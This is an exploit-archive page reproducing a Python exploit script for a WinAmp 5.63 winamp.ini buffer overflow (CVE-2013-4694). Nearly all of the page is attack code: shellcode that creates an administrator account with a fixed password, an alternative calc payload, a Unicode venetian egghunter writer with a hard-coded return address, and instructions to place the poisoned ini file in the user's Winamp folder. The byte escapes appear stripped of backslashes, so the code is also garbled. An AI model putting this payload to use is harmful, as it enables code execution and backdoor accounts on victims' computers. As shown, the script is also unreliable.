Home / exploitsPDF  

WinAmp 5.63 winamp.ini Local Exploit

Posted on 27 August 2013

<pre># Exploit Title: winampevilskin.py
# Date: 25 August 2013
# Exploit Author: Ayman Sagy &lt;aymansagy@gmail.com&gt;
# Vendor Homepage: http://www.winamp.com/
# Version: 5.63
# Tested on: Windows XP Professional SP3 Version 2002
# CVE : 2013-4694
#
# Ayman Sagy &lt;aymansagy@gmail.com&gt; August 2013
#
# This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/
# Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security
#
# The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup
#
#
# I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it
# If you can make it work or find a solution for ASLR/DEP please contact me
#
# So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it
# The egg and shellcode can be found in plain ASCII in memory
#
# Tested against Windows XP Pro SP3
# Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
# run with Python 2.7
  
import sys, getopt, os
  
def usage():
      print('winampevilskin.py by Ayman Sagy &lt;aymansagy@gmail.com&gt;
')
      print('Usage: python ' + sys.argv[0] + ' -p &lt;payload&gt;')
      print('Payload could be:')
      print('	[user] to create new admin account ayman/P@ssw0rd')
      print('	[calc] run calculator')
      print('for e.g.: python ' + sys.argv[0] + ' -p user')
  
  
#appdata = os.environ['APPDATA']
  
  
# Windows add admin user: ayman P@ssw0rd
scadduser = ( b&quot;xbfxabxd0x9ax5bxdaxc7xd9x74x24xf4x5ax2bxc9&quot; +
&quot;xb1x45x83xc2x04x31x7ax11x03x7ax11xe2x5ex2c&quot; +
&quot;x72xd2xa0xcdx83x85x29x28xb2x97x4dx38xe7x27&quot; +
&quot;x06x6cx04xc3x4ax85x9fxa1x42xaax28x0fxb4x85&quot; +
&quot;xa9xa1x78x49x69xa3x04x90xbex03x35x5bxb3x42&quot; +
&quot;x72x86x3cx16x2bxccxefx87x58x90x33xa9x8ex9e&quot; +
&quot;x0cxd1xabx61xf8x6bxb2xb1x51xe7xfcx29xd9xaf&quot; +
&quot;xdcx48x0exacx20x02x3bx07xd3x95xedx59x1cxa4&quot; +
&quot;xd1x36x23x08xdcx47x64xafx3fx32x9exd3xc2x45&quot; +
&quot;x65xa9x18xc3x7bx09xeax73x5fxabx3fxe5x14xa7&quot; +
&quot;xf4x61x72xa4x0bxa5x09xd0x80x48xddx50xd2x6e&quot; +
&quot;xf9x39x80x0fx58xe4x67x2fxbax40xd7x95xb1x63&quot; +
&quot;x0cxafx98xe9xd3x3dxa7x57xd3x3dxa7xf7xbcx0c&quot; +
&quot;x2cx98xbbx90xe7xdcx34xdbxa5x75xddx82x3cxc4&quot; +
&quot;x80x34xebx0bxbdxb6x19xf4x3axa6x68xf1x07x60&quot; +
&quot;x81x8bx18x05xa5x38x18x0cxc6xd3x82x81x6dx54&quot; +
&quot;x2exfex42xc7x90x90xf9x73xf1x19x72x19x83xc1&quot; +
&quot;x15x98x0ex63xbbx7ax81x23x30x08x56x94xc4x8a&quot; +
&quot;xb8xfbx69x17xfdx23x4fxb1xddx4dxeaxc9x3dxfe&quot; +
&quot;x9bx52x5fx92x04xe7xf0x1fxbax27x4ex84x57x41&quot; +
&quot;x3ex2dxd4xe5xccxccx6ex69x43x7cxaex14xdaxef&quot; +
&quot;xcfxb8x3cxdfx4ex01x79x1f&quot;
)
  
# http://shell-storm.org/shellcode/files/shellcode-739.php
sccalc = (b&quot;x31xC9&quot;+                # xor ecx,ecx
        &quot;x51&quot;+                    # push ecx       
        &quot;x68x63x61x6Cx63&quot;+    # push 0x636c6163       
        &quot;x54&quot;+                    # push dword ptr esp       
        &quot;xB8xC7x93xC2x77&quot;+    # mov eax,0x77c293c7       
        &quot;xFFxD0&quot;
          )
  
if len(sys.argv) &lt; 2:
      usage()
      exit(1)
  
try:
      opts, args = getopt.getopt(sys.argv[1:],'p:')
except getopt.GetoptError:
      usage()
      exit(1)
for opt, arg in opts:
      if opt == '-p':
            if arg == 'user':
                  shellcode = &quot;aymnaymn&quot; + &quot;x90&quot; + &quot;x90&quot; * 100 + scadduser + &quot;x90&quot; * 89
            elif arg == &quot;calc&quot;:
                  shellcode = &quot;aymnaymn&quot; + b&quot;x90&quot; * 452 + b&quot;x90&quot; + sccalc + b&quot;x90&quot; * 23
            else:
                  print(&quot;Error: Invalid payload.
&quot;)
                  usage()
                  sys.exit()
  
  
#print(str(len(shellcode)))
  
egghunter = (&quot;x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74&quot;+
&quot;xefxb8x61x79x6dx6ex8bxfaxafx75xeaxafx75xe7xffxe7&quot;)
  
sploit = ( # Unicode-friendly venetian egghunter writer
                                    # Setup Registers
           &quot;x50x72x50&quot;+          # push eax twice
           &quot;x72&quot; +                 # align
           &quot;x59x72x5f&quot;+          # pop ecx pop edi
           &quot;x72&quot; +
           &quot;x05xc2x02x01&quot;+      # 05 00020001      ADD EAX,1000200
           &quot;x72&quot;+
           &quot;x2dxc2x01x01&quot;+      # 2D 00010001      SUB EAX,1000100
                                    # EAX is now EAX+100
           &quot;x72x48&quot;+      # dec eax 4 times
           &quot;x72x48&quot;+
           &quot;x72x48&quot;+
           &quot;x72x48x72&quot;+
                                    # Pave Ahead
                                    # write NOPs in locations that will stop later execution
           &quot;xc3x86xc2x90&quot;+      # C600 90          MOV BYTE PTR DS:[EAX],90
           &quot;x72x40x72&quot;+          # 40               INC EAX
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x90&quot;+
           &quot;x72x40x72&quot;+
             
           &quot;xc2x91&quot;               # 91               XCHG EAX,ECX
           &quot;x72&quot; +                 # align          
                                    # Start writing egghunter shellcode, EGG = aymn
           &quot;xc3x86x66&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x81&quot;+ #81
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3x8a&quot;+ #ca
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3xbf&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x0f&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x42&quot;+ # 42
           &quot;x72x40x72&quot;+
           &quot;xc3x86x52&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x6a&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x02&quot;+
           &quot;x72x40x72&quot;+
             
           &quot;x34&quot; * 4 +             # Padding
           &quot;xc3xb0x30&quot;+          # 0x003000F0  CALL EAX winamp.exe WinXP Pro SP3
                                    # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
  
           &quot;x72&quot;
           &quot;xc3x86x58&quot;+ #58
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3x8d&quot;+ #cd
           &quot;x72x40x72&quot;+
           &quot;xc3x86x2e&quot;+ #2e
           &quot;x72x40x72&quot;+
           &quot;xc3x86x3c&quot;+ # 3c
           &quot;x72x40x72&quot;+
           &quot;xc3x86x05&quot;+ # 5
           &quot;x72x40x72&quot;+
           &quot;xc3x86x5a&quot;+
             
           &quot;x72x40x72&quot;+
           &quot;xc3x86x74&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3xaf&quot;+ # ef
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2xb8&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x61&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x79&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x6d&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86x6e&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2x8b&quot;+
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3xba&quot;+ #fa
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2xaf&quot;+ # af
           &quot;x72x40x72&quot;+
           &quot;xc3x86x75&quot;+ #75
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3xaa&quot;+ #ea
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc2xaf&quot;+ # af
           &quot;x72x40x72&quot;+
           &quot;xc3x86x75&quot;+ #75
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3xa7&quot;+ # e7
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3xbf&quot;+ # ff
           &quot;x72x40x72&quot;+
           &quot;xc3x86xc3xa7&quot;+ # e7
           &quot;x72&quot;+
           &quot;x57&quot;+                  # 57               PUSH EDI
           &quot;x72&quot;+                  # align
           &quot;xc3x83&quot;+              # C3               RETN
           &quot;x34&quot; * 200             # Padding
    )
  
  
  
winamp = (&quot;[Winamp]
utf8=1
&quot; +
&quot;skin=&quot; + sploit + &quot;
&quot;
&quot;[WinampReg]
IsFirstInst=0
NeedReg=0
&quot; +
          &quot;[in_wm]
numtypes=7
&quot; +
          &quot;type0=WMA
description0=Windows Media Audio File (*.WMA)
&quot; +
          &quot;protocol0=0
avtype0=0
&quot; +
          &quot;type1=WMV
description1=Windows Media Video File (*.WMV)
&quot; +
          &quot;protocol1=0
avtype1=1
type2=ASF
&quot; +
          &quot;description2=Advanced Streaming Format (*.ASF)
&quot; +
          &quot;protocol2=0
avtype2=1
type3=MMS://
&quot; +
          &quot;description3=Windows Media Stream
protocol3=1
&quot; +
          &quot;avtype3=1
type4=MMSU://
&quot;
          &quot;description4=Windows Media Stream
protocol4=1
&quot; +
          &quot;avtype4=1
type5=MMST://
&quot; +
          &quot;description5=Windows Media Stream
protocol5=1
&quot; +
          &quot;avtype5=1
type5=&quot; + &quot;x90x90xe9x0f&quot; + &quot;
description6=&quot; +
          shellcode  + &quot;
protocol6=0
avtype6=0
&quot;)
  
#f = open(appdata + &quot;Winampwinamp.ini&quot;, &quot;wb&quot;) or sys.exit(&quot;Error creating winamp.ini&quot;)
f = open(&quot;winamp.ini&quot;, &quot;wb&quot;) or sys.exit(&quot;Error creating winamp.ini&quot;)
f.write(winamp)
f.close()
  
print(&quot;winamp.ini written, copy it into %APPDATA%\Winamp&quot;)
</pre>

 

TOP

Malware :

Exploits :